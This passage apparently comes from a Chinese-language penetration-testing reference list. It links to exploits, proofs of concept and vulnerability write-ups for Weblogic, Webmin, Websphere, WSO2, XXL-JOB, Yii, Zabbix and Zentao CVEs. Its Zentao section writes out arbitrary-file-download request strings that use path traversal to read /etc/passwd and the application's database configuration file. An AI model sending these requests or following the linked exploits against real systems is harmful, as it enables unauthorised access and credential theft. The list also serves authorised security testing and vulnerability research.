[Weblogic一键漏洞检测工具,V1.5,更新时间:20200730](https://github.com/rabbitmask/WeblogicScan) [About WeblogicTool,GUI漏洞利用工具,支持漏洞检测、命令执行、内存马注入、密码解密等(深信服深蓝实验室天威战队强力驱动)](https://github.com/KimJun1010/WeblogicTool) [CVE-2020-14882&CVE-2020-14883 Weblogic未授权远程命令执行漏洞](https://www.cnblogs.com/liliyuanshangcao/p/13962160.html) ## Webmin [KrE80r/webmin_cve-2019-12840_poc](https://github.com/KrE80r/webmin_cve-2019-12840_poc) [vulhub/webmin/CVE-2019-15107/README.zh-cn.md](https://github.com/vulhub/vulhub/blob/master/webmin/CVE-2019-15107/README.zh-cn.md) [jas502n/CVE-2019-15642](https://github.com/jas502n/CVE-2019-15642) ## Websphere [IBM Websphere Portal - Persistent Cross-Site Scripting](https://www.exploit-db.com/exploits/36941) [websphere_rce.py](https://github.com/Coalfire-Research/java-deserialization-exploits/blob/master/WebSphere/websphere_rce.py) [websphereCVE-2015-7450](http://www.zstreamer.cn/2020/07/19/websphere-cve-2015-7450/) [Websphere ND远程命令执行分析以及构造RpcServerDispatcher Payload(CVE-2019-4279)](https://xz.aliyun.com/t/6394) [WebSphere XXE 漏洞分析(CVE-2020-4643)](https://paper.seebug.org/1342/) [Turning bad SSRF to good SSRF: Websphere Portal](https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/) ## Wso2 [WSO2 RCE (CVE-2022-29464) 漏洞利用](https://github.com/hakivvi/CVE-2022-29464) ## XXL-JOB [XXL-JOB 默认 accessToken 身份绕过漏洞](https://blog.csdn.net/qq_41904294/article/details/134201486) ## Yii [CVE-2020-15148 Yii2反序列化RCE POP链分析](https://mp.weixin.qq.com/s/NHBpF446yKQbRTiNQr8ztA) [Maskhe/CVE-2020-15148-bypasses](https://github.com/Maskhe/CVE-2020-15148-bypasses) ## Zabbix [Zabbix Saml Bypass](https://github.com/Henry4E36/zabbix-saml-bypass) [zabbix latest.php SQL注入漏洞 (CVE-2016-10134)](https://vulhub.org/#/environments/zabbix/CVE-2016-10134/) [Zabbix sql注入漏洞复现(CVE-2016-10134)](https://mp.weixin.qq.com/s/Gi3NMbZcgMutE8mNqCmNAw) [CVE-2020-11800 zabbix RCE漏洞细节披露](https://xz.aliyun.com/t/8991) [CVE-2021-27927: Zabbix-CSRF-to-RCE](https://mp.weixin.qq.com/s/eyVwNKRfWpSGNA7Gq8KpWA) [CVE-2022-23131 Zabbix SAML SSO认证绕过漏洞分析与复现](https://mp.weixin.qq.com/s/-TAUjvdigi9TzjoPpMe1kw) [Mr-xn/cve-2022-23131](https://github.com/Mr-xn/cve-2022-23131) [CVE-2022-23134 Zabbix漏洞分析之二:从未授权访问到接管后台](https://mp.weixin.qq.com/s/jq2AvDlHCosb3zViPXGTaQ) ## Zentao CNVD-2020-65242 后台任意文件下载 ``` index.php?m=file&f=sendDownHeader&fileName=2&fileType=1&content=/etc/passwd&type=file index.php?m=file&f=sendDownHeader&fileName=2&fileType=1&content=./../../config/my.php&type=file ``` 后台 im 模块 downloadXxdPackage 函数任意文件下载 ``` index.php?m=im&f=downloadXxdPackage&xxdFileName=../../../../../../../../../etc/passwd ``` [Zentao v16.5 SQL Injection POC](https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go) [禅道12.4.2后台管理员权限Getshell复现](https://mp.weixin.qq.com/s/Uak631OOC48WcshaYnvsRQ)